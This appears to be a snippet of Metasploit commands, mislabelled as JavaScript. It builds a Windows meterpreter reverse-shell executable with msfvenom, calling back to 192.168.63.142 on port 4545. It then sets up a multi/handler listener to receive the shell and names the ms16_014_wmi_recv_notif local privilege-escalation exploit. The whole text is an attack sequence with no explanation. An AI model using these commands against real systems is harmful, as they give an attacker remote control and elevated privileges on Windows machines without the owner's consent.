代码语言:javascript复制
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.63.142 lport=4545 -f exe > shell.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.63.142
set lport 4545
exploit -j
exploit/windows/local/ms16_014_wmi_recv_notif